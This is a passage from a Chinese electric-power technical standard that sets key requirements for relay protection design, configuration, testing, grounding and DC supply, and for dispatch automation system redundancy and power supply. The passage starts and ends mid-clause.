(含光纤、微波、载波等通道及加工设备和供电电源等)、远方跳闸及就地判别 装置(或功能)应遵循相互独立的原则按双重化配置。穿越覆冰区的220kV及以 上电压等级输电线路,应至少配置一条不受冰灾影响的应急通道。 18.1.9 100MW及以上容量及接入220kV及以上电压等级的发电机、启备变应 按双重化原则配置微机保护(非电量保护除外);重要发电厂的启备变保护宜采 用双重化配置。 18.1.10 对220kV及以上电压等级电网、110(66)kV变压器的保护和测控功 能应相互独立,在单一功能损坏或异常情况下,保护和测控功能应互相不受影响。 18.1.11 继电保护及安全稳定控制装置组屏设计应充分考虑运行和检修时的 安全性,应采取合理布置端子排、预留足够检修空间、规范现场安全措施等防止 160 继电保护“三误”(误碰、误整定、误接线)事故的措施。当双重化配置的两套保 护装置不能实施确保运行和检修安全的技术措施时,应安装在各自屏柜内。 18.1.12 为保证继电保护相关辅助设备(如交换机、光电转换器、通讯接口 装置等)的供电可靠性,宜采用直流电源供电。因硬件条件限制只能交流供电的, 电源应取自站用不间断电源。 18.1.13 在新建、扩建和技改工程中,应根据相关规定和电网发展带来的系 统短路容量增加等情况进行电流互感器的选型工作,并充分考虑到保护配置及整 定的要求。 18.1.14 差动保护用电流互感器的相关特性宜一致;母线差动保护各支路电 流互感器变比差不宜大于4倍。 18.1.15 母线差动、变压器差动和发变组差动保护各支路的电流互感器应优 先选用准确限值系数(KalF)和额定拐点电压较高的电流互感器。 18.1.16 应充分考虑合理的电流互感器配置和二次绕组分配,消除主保护死 区。 18.1.16.1 当220kV及以上电压等级变电站、升压站新建、改建或扩建采用 3/2、4/3、角形、桥形接线等多断路器接线形式时,应在断路器两侧均配置电流 互感器。 18.1.16.2 对经计算影响电网安全稳定运行重要变电站的220kV及以上电压 等级双母线双分断接线方式的母联、分段断路器,应在断路器两侧配置电流互感 器。 18.1.16.3 独立式CT应按照CT故障时跳闸范围最小的原则合理选择等电位 点。 18.1.16.4 针对短期不能按18.1.16.1及18.1.16.2要求进行改造的老旧厂站或 其他确实无法快速切除故障的保护动作死区,在满足系统稳定要求的前提下,应 采取启动失灵和远方跳闸等后备措施加以解决;经系统方式计算可能对系统稳定 造成较严重的威胁时,应进行改造。 18.1.17 110(66)kV及以上电压等级发电厂升压站、变电站应配置故障录 波器;100MW及以上容量发电机-变压器组应配置专用故障录波器。发电厂、变 电站内的故障录波器应对站用直流系统的各母线段(控制、保护)对地电压进行 161 录波。 18.1.18 除母线保护、变压器保护、发变组保护外,不同间隔设备的主保护 功能不应集成。 18.1.19 应充分考虑安装环境对保护装置性能及寿命的影响,对于布置在室 外的保护装置,其附属设备(如智能控制柜及温控设备)的性能指标应满足保护 运行要求且便于维护。 18.1.20 继电保护及相关设备的端子排,应按照功能进行分区、分段布置, 正、负电源之间、跳(合)闸引出线之间以及跳(合)闸引出线与正电源之间、 交流电流与交流电压回路之间等应至少采用一个空端子隔开或增加绝缘隔片。交 流回路与直流回路的接线端子不宜布置在同一段端子排。新建、扩建、改建工程 中,端子箱、汇控柜等户外设备应采用额定电压1000V的端子。 18.1.21 500kV及以上电压等级变压器低压侧并联电抗器和电容器、站用变 压器的保护配置与设计,应与一次系统相适应,防止电抗器、电容器或站用变压 器故障造成主变压器的跳闸。 18.1.22 双回线路采用同型号纵联保护,或线路纵联保护采用双重化配置时, 在回路设计和调试过程中应采取有效措施防止保护通道交叉使用。分相电流差动 保护应采用同一路由收发、往返延时一致的通道。 18.1.23 对闭锁式纵联保护,“其它保护停信”回路应直接接入保护装置,而 不应接入收发信机。 18.1.24 发电厂升压站断路器控制回路及保护装置电源,应取自升压站配置 的独立的直流系统。 18.1.25 发电厂的辅机设备及其电源在外部系统发生故障时,应具有一定的 抵御事故能力,以保证发电机在外部系统故障情况下的持续运行。 18.1.26 稳控装置动作切除负荷或机组后,应采取有效措施防止重合闸、备 自投或被切除机组所带负荷转由同一厂站的其他机组承担等导致的控制措施失 效。 18.2 继电保护配置的重点要求 18.2.1 继电保护的设计、配置和选型应以继电保护可靠性、选择性、灵敏性、 速动性为基本原则,任何技术创新不得以牺牲继电保护的快速性和可靠性为代 162 价。 18.2.2 按双重化配置的两套保护中,当一套保护退出时不应影响另一套保护 运行。双重化配置的继电保护应满足以下基本要求: 18.2.2.1 两套保护装置的交流电流、电压应分别取自互感器互相独立的绕 组。对原设计中电压互感器仅有一组二次绕组,且已经投运的变电站,应积极安 排电压互感器的更新改造工作,改造完成前,应在开关场的电压互感器端子箱处, 利用具有短路跳闸功能的两组分相空气开关将按双重化配置的两套保护装置交 流电压回路分开。 18.2.2.2 两套保护装置的直流电源应取自不同蓄电池组连接的直流母线段。 每套保护装置及与其相关设备(电子式互感器、合并单元、智能终端、采集执行 单元、通讯及网络设备、操作箱、跳闸线圈等)的直流电源均应取自于同一蓄电 池组连接的直流母线段,避免因一组站用直流电源异常对两套保护功能同时产生 影响而导致的保护拒动。 18.2.2.3 按双重化配置的两套保护装置的跳闸回路应与断路器的两个跳闸 线圈、压力闭锁继电器分别一一对应。 18.2.2.4 双重化配置的两套保护装置之间不应有电气联系。两套保护装置与 其他保护、设备配合的回路及通道应遵循相互独立的原则,应保证每一套保护装 置与其他相关装置(如通道、失灵保护)联络关系的正确性,防止因交叉停用导 致保护功能缺失。 18.2.2.5 为防止装置家族性缺陷可能导致的双重化配置的两套继电保护装 置同时拒动的问题,新建、改建、扩建工程双重化配置的线路、变压器、发电机 变压器组、调相机变压器组、母线、高压电抗器保护装置宜采用不同生产厂家的 产品。 18.2.3 220kV及以上电压等级的线路保护应满足以下要求: 18.2.3.1 每套保护均应能对全线路内发生的各种类型故障快速动作切除。对 于要求实现单相重合闸的线路,在线路发生单相经高阻接地故障时,应能正确选 相跳闸。 18.2.3.2 对于远距离、重负荷线路及负荷转移等情况,继电保护装置应采取 有效措施,防止相间、接地距离保护在系统发生较大的潮流转移时误动作。 163 18.2.3.3 应采取措施,防止由于零序功率方向元件的电压死区导致零序功率 方向纵联保护拒动,零序动作电压不应低于最大可能的零序不平衡电压。 18.2.4 220kV及以上电压等级变压器、电抗器单套配置的非电量保护以及 单套配置的断路器失灵保护应同时作用于断路器的两个跳闸线圈。未采用就地跳 闸方式的非电量保护应设置独立的电源回路(包括直流空气小开关及其直流电源 监视回路)和出口跳闸回路,且应与电气量保护完全分开。当变压器、电抗器的 非电量保护采用就地跳闸方式时,应向监控系统发送动作信号。 18.2.5 非电量保护及动作后不能随故障消失而立即返回的保护(只能靠手动 复位或延时返回)不应启动失灵保护。发电机电气量保护应启动失灵保护。 18.2.6 发电机-变压器组的阻抗保护须经电流元件(如电流突变量、负序电 流等)启动,正常运行期间在发生电压二次回路失压、断线以及切换过程中交流 或直流失压等异常情况时,阻抗保护应具有防止误动措施。 18.2.7 200MW及以上容量发电机定子接地保护宜将基波零序过电压保护 与三次谐波电压保护的出口分开,基波零序过电压保护投跳闸。 18.2.8 采用零序电压原理的发电机匝间保护应设有负序方向闭锁元件。 18.2.9 并网电厂均应制定完备的发电机带励磁失步振荡故障的应急措施, 300MW及以上容量的发电机应配置失步保护,在进行发电机失步保护整定计算 和校验工作时应能正确区分失步振荡中心所处的位置,在机组进入失步工况时根 据不同工况选择不同延时的解列方式,并保证断路器断开时的电流不超过断路器 失步允许开断电流。 18.2.10 发电机的失磁保护应使用能正确区分短路故障和失磁故障的、具备 复合判据的方案。应仔细检查和校核发电机失磁保护的整定范围与励磁系统低励 限制的配合关系,防止发电机进相运行时发生误动作。 18.2.11 300MW及以上容量发电机应配置起、停机保护,应考虑防止并网 断路器承受过电压造成的断口闪络问题;对并入220kV及以上电压等级系统的发 变组,高压侧断路器应配置断路器断口闪络保护。 18.2.12 全电缆线路禁止采用重合闸,对于含电缆的混合线路应根据电缆线 路距离出口的位置、电缆线路的比例等实际情况采取停用重合闸等措施,防止变 压器及电网连续遭受短路冲击。 164 18.2.13 220kV及以上电压等级变压器、发变组的断路器失灵保护应满足以 下要求: 18.2.13.1 当接线形式为线路—变压器或线路—发变组时,线路和主设备的 电气量保护均应启动断路器失灵保护。当本侧断路器无法切除故障时,应采取启 动远方跳闸等后备措施加以解决。 18.2.13.2 变压器的电气量保护应启动断路器失灵保护,断路器失灵保护动 作除应跳开失灵断路器相邻的全部断路器外,还应跳开本变压器连接其他电源侧 的断路器。 18.2.13.3 发电机机端断路器失灵保护判据中不应使用机端断路器辅助触点 作为判据。 18.2.14 防跳继电器动作时间应与断路器动作时间配合,断路器三相位置不 一致保护的动作时间应与相关保护、重合闸时间相配合。 18.2.15 断路器失灵保护中用于判断断路器主触头状态的电流判别元件应保 证其动作和返回的快速性,动作和返回时间均不宜大于20ms,其返回系数也不 应低于0.9。 18.2.16 为提高切除变压器低压侧母线故障的可靠性,宜在变压器的低压侧 设置取自不同电流回路的两套电流保护功能。当短路电流大于变压器热稳定电流 时,变压器保护切除故障的时间不宜大于2s。 18.2.17 变压器过励磁保护的启动、反时限和定时限元件应根据变压器的过 励磁特性曲线分别进行整定,其返回系数不应低于0.96。 18.2.18 110(66)kV及以上电压等级的母联、分段断路器宜按断路器配置 具备瞬时和延时跳闸功能的过电流保护装置或功能。 18.2.19 有保护远方修改定值等远方控制业务需求的场站,应有措施保证保 护定值修改的安全性。 18.3 调试及检验的重点要求 18.3.1 应从保证设计、调试和验收质量的要求出发,合理确定新建、改建、 扩建工程工期。工程调试应严格按照规程规定执行,不得为赶工期减少调试项目, 降低调试质量。 18.3.2 新建、改建、扩建工程的相关设备投入运行后,施工(或调试)单位 165 应及时提供完整的一、二次设备安装资料及调试报告,并应保证图纸与实际投入 运行设备相符。 18.3.3 保护验收应进行所有保护整组检查,模拟故障检查保护与硬(软)压 板的唯一对应关系,避免有寄生回路存在。 18.3.4 保护装置整组传动验收时,应检验同一间隔内所有保护之间的相互配 合关系;线路纵联保护还应与对侧线路保护进行一一对应的联动试验;新投保护 装置应考虑被保护设备的各套保护装置同时、不同时动作,采取有效方法对两套 保护装置、控制电源及相关回路进行验证。 18.3.5 所有继电保护及安全自动装置投入运行前,除应在能够保证互感器与 测量仪表精度的负荷电流条件下,测定相回路和差回路外,还必须测量各中性线 的不平衡电流、电压,以保证保护装置和二次回路接线的正确性。 18.3.6 验收方应根据有关规程、规定及反措要求制定详细的验收标准。新设 备投产前应认真编写保护启动方案,做好事故预想,确保新投设备发生故障能可 靠被切除。 18.3.7 应保证继电保护装置、安全自动装置、故障录波器、保护故障信息管 理系统等二次设备与一次设备同期投入。 18.3.8 继电保护及安全自动装置应按照《继电保护和电网安全自动装置检验 规程》(DL∕T 995)等标准要求开展检修及出口传动检验,确保传动开关的正确 性与断路器跳合闸回路的可靠性,确保功能完整可用。 18.3.9 稳控系统应按照“入网必检、逢修必验”原则加强稳控系统厂内测试、 工程验证和现场调试,严格落实软件改动后全面测试原则。 18.4 运行管理阶段的重点要求 18.4.1 加强继电保护及安全自动装置软件版本的管控,新投、修改、升级前, 应对其书面说明材料及检测报告进行确认,并对原运行软件进行备份。发电厂、 电铁牵引站等与电网相联的并网线路两侧纵联保护装置型号、软件版本应相适 应。未经调度部门认可的软件版本和智能站配置文件不得投入运行。现场二次回 路变更应经相关保护管理部门同意并及时修订相关的图纸资料。 18.4.2 加强继电保护装置运行维护工作。装置检验应保质保量,严禁超期和 漏项,应特别加强对基建投产设备及新安装装置投产验收检验和首年全检工作, 166 消除设备运行隐患。 18.4.3 配置足够的保护备品、备件,缩短继电保护缺陷处理时间。 18.4.4 加强继电保护试验仪器、仪表的管理工作,每1~2年应对继电保护试 验装置进行一次全面检测,防止因试验仪器、仪表存在问题而造成继电保护误整 定、误试验。 18.4.5 继电保护专业和通信专业应密切配合,加强对纵联保护通道设备的检 查,重点检查是否设定了不必要的收、发信环节的延时或展宽时间。注意校核继 电保护通信设备(光纤、微波、载波)传输信号的可靠性和冗余度及通道传输时 间,防止因通信问题引起保护不正确动作。 18.4.6 利用载波作为纵联保护通道时,应建立阻波器、结合滤波器等高频通 道加工设备的定期检修制度。对已退役的高频阻波器、结合滤波器和分频滤过器 等设备,应及时采取安全隔离措施。 18.4.7 配置母差保护的变电站,在母差保护停用期间应采取相应措施,严格 限制母线侧刀闸的倒闸操作,以保证系统安全。 18.4.8 针对电网运行工况,加强备用电源自动投入装置的管理,定期进行传 动试验,保证事故状态下投入成功率。 18.4.9 在电压切换和电压闭锁回路,断路器失灵保护,母线差动保护,远跳、 远切、联切回路、“和电流”等接线方式有关的二次回路上工作时,以及3/2断路 器接线单断路器检修而相邻断路器仍需运行时,应做好安全隔离措施。 18.4.10 新投运或电流、电压回路发生变更的220kV及以上保护设备,在第 一次经历区外故障后,应通过保护装置和故障录波器相关录波数据校核保护交流 采样值、功率方向以及差动保护差流值的正确性。 18.4.11 建立和完善二次设备在线监视与分析系统,确保继电保护信息、故 障录波等可靠上送。在线监视与分析系统应严格按照国家有关网络安全规定,做 好安全防护。 18.4.12 对于运行工况不良以及运行超过12年的110kV及以上保护装置,经 评估存在保护拒动、误动或无法及时消缺等运行风险,应立项改造。 18.4.13 电网调整运行方式时,应充分考虑其对稳控系统的影响,保证稳控 系统控制功能正常运行。 167 18.4.14 电厂应开展初步设计、施工图设计、施工调试、验收并网、生产运 行、退役报废、技术改造等阶段的继电保护及安全自动装置全过程技术监督。电 厂技术监督工作应落实调度机构的涉网安全要求,涉网安全检查发现的问题同时 做为电厂技术监督问题纳入闭环整改流程。 18.4.15 严格执行工作票制度和二次工作安全措施票制度,规范现场安全措 施,防止继电保护“三误”事故。相关专业工作涉及继电保护及安全自动装置相 关二次回路时,应遵守继电保护专业技术要求及管理规定,避免导致保护不正确 动作。 18.5 定值管理的重点要求 18.5.1 依据电网结构和继电保护配置情况,按相关规定进行继电保护的整定 计算。当灵敏性与选择性难以兼顾时,应首先考虑以保灵敏度为主,防止保护拒 动,可提前设置失配点,并备案报主管领导批准,做好失配风险的管控。 18.5.2 发电企业应按相关规定进行继电保护整定计算,并认真校核与电网侧 保护的配合关系。加强对主设备及厂用系统的继电保护整定计算与管理工作,安 排专人每年对所辖设备的整定值进行全面复算和校核,当厂用系统结构或参数发 生变化时应对所辖设备的整定值进行全面复算和校核,当系统阻抗变化较大时应 对系统阻抗相关的保护进行校核,注意防止因厂用系统保护不正确动作,扩大事 故范围。 18.5.3 大型发电机高频、低频保护整定计算时,应分别根据发电机在并网前、 后的不同运行工况和制造厂提供的发电机性能、特性曲线,并结合电网要求进行 整定计算。 18.5.4 发变组过励磁保护的启动元件、反时限和定时限应能分别整定,其返 回系数不宜低于0.96。整定计算应全面考虑主变压器及高压厂用变压器的过励磁 能力,并与励磁调节器V/Hz限制特性相配合,按励磁调节器V/Hz限制首先动作、 再由过励磁保护动作的原则进行整定和校核。 18.5.5 发电机负序电流保护应根据制造厂提供的负序电流暂态限值(A值) 进行整定,并留有一定裕度。应校核发电机保护启动失灵保护的零序或负序电流 判别元件满足灵敏度要求。 18.5.6 发电机励磁绕组过负荷保护应投入运行,且与励磁调节器过励磁限制 168 (OEL)相配合。 18.5.7 变压器中、低压侧为110kV及以下电压等级且并列运行的,其中、低 压侧后备保护宜第一时限跳开母联或分段断路器,缩小故障范围。 18.6 二次回路的重点要求 18.6.1 装设静态型、微机型继电保护装置机箱应构成良好电磁屏蔽体,并有 可靠的接地措施。 18.6.2 重视继电保护二次回路的接地问题,并定期检查这些接地点的可靠性 和有效性。继电保护二次回路接地应满足以下要求: 18.6.2.1 电流互感器或电压互感器的二次回路只能有一个接地点。当两个及 以上电流(电压)互感器二次回路间有直接电气联系时,其二次回路接地点设置 应符合以下要求: (1)便于运行中的检修维护。 (2)互感器或保护设备的故障、异常、停运、检修、更换等均不得造成运 行中的互感器二次回路失去接地。 18.6.2.2 未在开关场接地的电压互感器二次回路,宜在电压互感器端子箱处 将每组二次回路中性点分别经放电间隙或氧化锌阀片接地,其击穿电压峰值应大 于 30·Imax V(Imax 为电网接地故障时通过变电站的可能最大接地电流有效值, 单位为kA)。应定期检查、更换放电间隙或氧化锌阀片,防止造成电压二次回 路出现多点接地。为保证接地可靠,各电压互感器的中性线不得接有可能断开的 开关或熔断器等。 18.6.2.3 独立的、与其他互感器二次回路没有电气联系的电流互感器二次回 路在开关场一点接地时,应考虑将开关场不同点地电位引至同一保护柜时对二次 回路绝缘的影响。 18.6.2.4 严禁在保护装置电流回路中并联接入过电压保护器,防止过电压保 护器不可靠动作引起差动保护误动作。 18.6.3 二次回路电缆敷设应符合以下要求: 18.6.3.1 合理规划二次电缆的路径,尽可能离开高压母线、避雷器和避雷针 的接地点,并联电容器、电容式电压互感器、结合电容及电容式套管等设备;避 免和减少迂回以缩短二次电缆的长度;拆除与运行设备无关的电缆。 169 18.6.3.2 交流电流和交流电压回路、不同交流电压回路、交流和直流回路、 强电和弱电回路、来自电压互感器二次的四根引入线和电压互感器开口三角绕组 的两根引入线均应使用各自独立的电缆。 18.6.3.3 保护装置的跳闸回路和启动失灵回路均应使用各自独立的电缆。 18.6.4 严格执行有关规程、规定及反措,防止二次寄生回路的形成。 18.6.5 在运行和检修中应加强对直流系统的管理,防止直流系统故障,特别 要防止交流串入直流回路,造成电网事故。 18.6.6 主设备非电量保护应防水、防震、防油渗漏、密封性好。气体继电器 至保护柜的电缆应尽量减少中间转接环节。 18.6.7 新建、改建、扩建工程引入两组及以上电流互感器构成和电流的继电 保护及安全自动装置,各组电流互感器应分别引入保护装置,禁止通过装置外部 回路形成和电流。 18.6.8 对经长电缆跳闸的回路,应采取防止长电缆分布电容影响和防止出口 继电器误动的措施。 18.6.9 继电保护及安全自动装置装置和保护屏柜应具有抗电磁干扰能力,保 护装置由屏外引入的开入回路应采用220V/110V直流电源。光耦开入的动作电压 应控制在额定直流电源电压的55%~70%范围以内。 18.6.10 继电保护及安全自动装置应选用抗干扰能力符合有关规程规定的产 品,针对来自系统操作、故障、直流接地等的异常情况,应采取有效防误动措施。 断路器失灵启动母线保护等重要回路应采用装设大功率重动继电器或者采取软 件防误等措施。外部开入直接跳闸、不经闭锁直接跳闸(如变压器和电抗器的非 电量保护、不经就地判别的远方跳闸等)的重要回路,应在启动开入端采用动作 电压在额定直流电源电压的55%~70%范围以内的中间继电器,并要求其动作功 率不低于5W。 18.6.11 采用油压、气压作为操作机构的断路器,当压力闭锁回路改动后, 应试验整组传动分、合、分—合—分正常;断路器弹簧机构未储能接点不得闭锁 跳闸回路。 18.6.12 备自投装置启动后跟跳主供电源开关时,禁止通过手跳回路启动跳 闸,以防止因同时启动“手跳闭锁备自投”逻辑而误闭锁备自投。 170 18.6.13 保护屏柜上交流电压回路的空气开关应与电压回路总路开关在跳闸 时限上有明确的配合关系。 18.6.14 应采取有效措施减少短路电流、电磁场等对继电保护装置、二次电 缆的干扰,具体要求如下: 18.6.14.1 在保护室屏柜下层的电缆室(或电缆沟道)内,沿屏柜布置的方 向逐排敷设截面积不小于100mm2的铜排(缆),将铜排(缆)的首端、末端分 别连接,形成保护室内的等电位地网。该等电位地网应与变电站主地网一点相连, 连接点设置在保护室的电缆沟道入口处。为保证连接可靠,等电位地网与主地网 的连接应使用4根及以上,每根截面积不小于50mm2的铜排(缆)。 18.6.14.2 分散布置保护小室(含集装箱式保护小室)的变电站,每个小室 均应设置与主地网一点相连的等电位地网,小室之间若存在相互连接的二次电 缆,则小室的等电位地网之间应使用截面积不小于100mm2的铜排(缆)可靠连 接,连接点应设在小室等电位地网与变电站主接地网连接处。保护小室等电位地 网与控制室、通信室等的地网之间亦应按上述要求进行连接。 18.6.14.3 微机保护和控制装置的屏柜下部应设有截面积不小于100mm2 的 铜排(不要求与保护屏绝缘),屏柜内所有装置、电缆屏蔽层、屏柜门体的接地 端应用截面积不小于4mm2的多股铜线与其相连,铜排应用截面不小于50mm2的 铜缆接至保护室内的等电位接地网。 18.6.14.4 直流电源系统绝缘监测装置的平衡桥和检测桥的接地端以及微机 型继电保护装置柜屏内的交流供电电源(照明、打印机和调制解调器)的中性线 (零线)不应接入保护专用的等电位接地网。 18.6.14.5 微机型继电保护装置之间、保护装置至开关场就地端子箱之间以 及保护屏至监控设备之间所有二次回路的电缆均应使用屏蔽电缆,电缆的屏蔽层 两端接地,严禁使用电缆内的备用芯线替代屏蔽层接地。控制和保护设备的直流 电源电缆宜采用屏蔽电缆。 18.6.14.6 为防止地网中的大电流流经电缆屏蔽层,应在开关场二次电缆沟 道内沿二次电缆敷设截面积不小于100mm2的专用铜排(缆);专用铜排(缆) 的一端在开关场的每个就地端子箱处与主地网相连,另一端在保护室的电缆沟道 入口处与主地网相连。 171 18.6.14.7 接有二次电缆的开关场就地端子箱内(包括汇控柜、智能控制柜) 应设有铜排(不要求与端子箱外壳绝缘),二次电缆屏蔽层、保护装置及辅助装 置接地端子、屏柜本体通过铜排接地。铜排截面积应不小于100mm2,一般设置 在端子箱下部,通过截面积不小于100mm2的铜缆与电缆沟内不小于的100mm2的 专用铜排(缆)及变电站主地网相连。 18.6.14.8 由一次设备(如变压器、断路器、隔离开关和电流、电压互感器 等)直接引出的二次电缆的屏蔽层应使用截面不小于4mm2多股铜质软导线仅在 就地端子箱处一点接地,在一次设备的接线盒(箱)处不接地,二次电缆经金属 管从一次设备的接线盒(箱)引至电缆沟,并将金属管的上端与一次设备的底座 或金属外壳良好焊接,金属管另一端应在距一次设备3~5m之外与主接地网焊接。 18.6.14.9 由纵联保护用高频结合滤波器至电缆主沟施放一根截面不小于 50mm2的分支铜导线,该铜导线在电缆沟的一侧焊至沿电缆沟敷设的截面积不小 于100mm2专用铜排(缆)上;另一侧在距耦合电容器接地点约3~5m处与变电站 主地网连通,接地后将延伸至保护用结合滤波器处。 18.6.14.10 结合滤波器中与高频电缆相连的变送器的一、二次线圈间应无直 接连线,一次线圈接地端与结合滤波器外壳及主地网直接相连;二次线圈与高频 电缆屏蔽层在变送器端子处相连后用不小于10mm2的绝缘导线引出结合滤波器, 再与上述与主沟截面积不小于100mm2的专用铜排(缆)焊接的50mm2分支铜导 线相连;变送器二次线圈、高频电缆屏蔽层以及50mm2分支铜导线在结合滤波器 处不接地。 18.6.14.11 当使用复用载波作为纵联保护通道时,结合滤波器至通信室的高 频电缆敷设应按18.6.14.9和18.6.14.10的要求执行。 18.6.14.12 保护室与通信室之间信号优先采用光缆传输。若传输模拟量电信 号,应采用双绞双屏蔽电缆,其中内屏蔽在信号接收侧单端接地,外屏蔽在电缆 两端接地。 18.6.14.13 应沿线路纵联保护光电转换设备至光通信设备光电转换接口装 置之间的2M同轴电缆敷设截面积不小于100mm2铜电缆。该铜电缆两端分别接至 光电转换接口柜和光通信设备(数字配线架)的接地铜排。该接地铜排应与2M 同轴电缆的屏蔽层可靠相连。为保证光电转换设备和光通信设备(数字配线架) 172 的接地电位的一致性,光电转换接口柜和光通信设备的接地铜排应同点与主地网 相连。重点检查2M同轴电缆接地是否良好,防止电网故障时由于屏蔽层接触不 良影响保护通信信号。 18.6.15 控制系统与继电保护的直流电源配置应满足以下要求: 18.6.15.1 对于按近后备原则双重化配置的保护装置,每套保护装置应由不 同的电源供电,并分别设有专用的直流空气开关。 18.6.15.2 母线保护、变压器差动保护、发电机差动保护、各种双断路器接 线方式的线路保护等保护装置与每一断路器的控制回路应分别由专用的直流空 气开关供电。 18.6.15.3 有两组跳闸线圈的断路器,其每一跳闸回路应分别由专用的直流 空气开关供电,且跳闸回路控制电源应与对应保护装置电源取自同一直流母线 段。 18.6.15.4 禁止继电保护及安全自动装置的蓄电池的两段直流电源以自动切 换的方式对同一设备进行供电。 18.6.15.5直流空气开关的额定工作电流应按最大动态负荷电流(即保护三相 同时动作、跳闸和收发信机在满功率发信的状态下)的2.0倍选用。 18.6.16 对发变组分相操作机构的断路器,除就地配置非全相保护外,宜在 发变组保护内配置具有反映发变组运行状态的电气量闭锁的非全相保护启动失 灵的逻辑及回路。 18.7 智能变电站继电保护的重点要求 18.7.1 有扩建需要的智能变电站,在初期设计、建设中,交换机、网络报文 分析仪、故障录波器、母线保护、公用测控装置、电压合并单元等公用设备需要 为扩建设备预留相关接口及通道,避免扩建时公用设备改造增加运行设备风险。 18.7.2 保护装置不应依赖外部对时系统实现其保护功能,避免对时系统或网 络故障导致同时失去多套保护。 18.7.3 220kV及以上电压等级的继电保护及与之相关的设备、网络等应按 照双重化原则进行配置,任一套装置故障不应影响双重化配置的两个网络。应采 取有效措施防止因网络风暴原因同时影响双重化配置的两个网络。 18.7.4 交换机VLAN划分应遵循“简单适用,统一兼顾”的原则,既要满足新 173 建站设备运行要求,防止由于交换机配置失误引起保护装置拒动,又要兼顾远景 扩建需求,防止新设备接入时多台交换机修改配置所导致的大规模设备陪停。 18.7.5 为保证智能变电站二次设备可靠运行、运维高效,合并单元、智能终 端、采集执行单元、交换机应采用经有资质的专业检测机构检测合格的产品,装 置应满足相关技术标准的互操作要求。 18.7.6 加强合并单元、采集执行单元额定延时参数的测试和验收,防止参数 错误导致的保护不正确动作。 18.7.7 运维单位应完善智能变电站现场运行规程,细化智能设备各类报文、 信号、硬压板、软压板的使用说明和异常处置方法,应规范压板操作顺序,现场 操作时应严格按照顺序进行操作,并在操作前后检查保护的告警信号,防止误操 作事故。 18.7.8 应加强SCD等配置文件在设计、基建、改造、验收、运行、检修等阶 段的全过程管控,验收时要确保SCD等文件的正确性及其与设备配置文件的一致 性,防止因SCD等文件错误导致保护失效或误动。 19 防止电力自动化系统、电力监控系统网络安全、电力通信网 及信息系统事故的重点要求 19.1 防止电力自动化系统事故 19.1.1 调度自动化主站系统和110kV及以上电压等级的厂站的主要设备(数 据采集与交换服务器、监视控制服务器、历史数据库服务器、分析决策服务器、 磁盘阵列、远动装置、电能量终端等)应采用冗余配置,互为热备,服务器的存 储容量和中央处理器负载应满足相关规定要求。备用调度控制系统及其通信通道 应独立配置,宜实现全业务备用。 19.1.2 主网500kV(330kV)及以上厂站、220kV枢纽变电站、大电源、电 网薄弱点、通过35kV及以上电压等级线路并网且装机容量40MW及以上的风电 场、光伏电站均应部署相量测量装置(PMU)。其测量信息应能满足调度机构 需求,并提供给厂站进行就地分析。相量测量装置与主站之间应采用调度数据网 络进行信息交互。新能源发电汇集站、直流换流站及近区厂站的相量测量装置应 具备连续录波和次/超同步振荡监测功能。 174 19.1.3 调度自动化主站系统应采用专用的、冗余配置的不间断电源(UPS) 供电,不应与信息系统、通信系统合用电源,不间断电源涉及的各级低压开关过 流保护定值整定应合理。采用模块化的UPS,应避免并联等效电阻过低,引起直 流绝缘监测装置监测误告警。UPS单机负载率应不高于40%。外供交流电消失后 UPS 电池满载供电时间应不小于2h。交流供电电源应采用两路来自不同电源点 供电。发电厂、变电站远动装置、计算机监控系统及其测控单元、变送器等自动 化设备应采用冗余配置的不间断电源或站内直流电源供电。具备双电源模块的装 置或计算机,两个电源模块应由不同电源供电。相关设备应加装防雷(强)电击装 置,相关机柜及柜间电缆屏蔽层应可靠接地。 19.1.4 厂站内的远动装置、相量测量装置、电能量终端、时间同步装置、计 算机监控系统及其测控单元、变送器及安全防护设备等自动化设备(子站)必须是 通过具有国家级检测资质的质检机构检验合格的产品。 19.1.5 调度范围内的发电厂、110kV及以上电压等级的变电站应采用开放、 分层、分布式计算机双网络结构,自动化设备电源模块通信模块应冗余配置,优 先采用专用装置,无旋转部件,采用经国家指定部门认证的安全加固的操作系统; 至调度主站(含主调和备调)应具有两路不同路由的网络通道(主/备双通道)。 19.1.6 发电厂、变电站基(改、扩)建工程中调度自动化设备的设计、选型应 符合调度自动化专业有关规程规定,并须经相关调度自动化管理部门同意。现场 设备的信息采集、接口和传输规约必须满足调度自动化主站系统的要求。改(扩) 建变电站(换流站)的改(扩)建部分和原有部分最终应接入同一监控系统,最 终不应采用两套或多套监控系统。 19.1.7 在基建调试和启动阶段,生产单位技术监督部门应在启动前检查现场 调度自动化设备安装验收情况,调度自动化设备有关的运行规程、操作手册、系 统配置图纸等应完整正确并与现场实际接线相符,调度自动化系统主站、子站、 调度数据网等必须提前进行调试,确保与一次设备同步投入运行,投产资料文档 应同步提交。 19.1.8 厂站数据通信网关机、相量测量装置、时间同步装置、调度数据网及 安全防护设备等屏柜宜集中布置,双套配置的设备宜分屏放置且两个屏应采用独 立电源供电。二次线缆的施工工艺、标识应符合相关标准、规范要求。 175 19.1.9 变电站、发电厂监控系统软件、应用软件升级和参数变更应经过测试 并向对应调度中心提交合格测试报告后方可投入运行。 19.1.10 主站系统应建立基础数据一体化维护使用机制和考核机制,利用状 态估计、综合智能告警、远程浏览、母线功率不平衡统计等手段,加强对基础数 据质量的监视与管理,不断提高基础数据(尤其是电网模型参数和运行数据)的 完整性、准确性、一致性和及时性。 19.1.11 发电厂自动发电控制和自动电压控制子站应具有可靠的技术措施, 对接收到的所属调度自动化主站下发的自动发电控制指令和自动电压控制指令 进行安全校核,对本地自动发电控制和自动电压控制系统的输出指令进行校验, 拒绝执行明显影响电厂或电网安全的指令。除紧急情况外,未经调度许可不得擅 自修改自动发电控制和自动电压控制系统的控制策略和相关参数。厂站自动发电 控制和自动电压控制系统的控制策略更改后,需要对安全控制逻辑、闭锁策略、 监控系统安全防护等方面进行全面测试验证,确保自动发电控制和自动电压控制 系统在启动过程、系统维护、版本升级、切换、异常工况等过程中不发出或执行 控制指令。 19.1.12 调度自动化系统运行维护管理部门应结合本网实际,建立健全各项 管理办法和规章制度,应包括但不限于制定和完善调度自动化系统运行管理规 程、调度自动化系统运行管理考核办法、机房安全管理制度、系统运行值班与交 接班制度、系统运行维护制度、运行与维护岗位职责和工作标准等。 19.1.13 应制定和落实调度自动化系统应急预案和故障恢复措施,系统和运 行数据应定期备份。 19.1.14 按照有关规定的要求,结合一次设备检修或故障处理,定期对调度 范围内厂站远动信息(含相量测量装置信息)进行测试。遥信传动试验应具有传动 试验记录,遥测精度应满足相关规定要求。 19.1.15 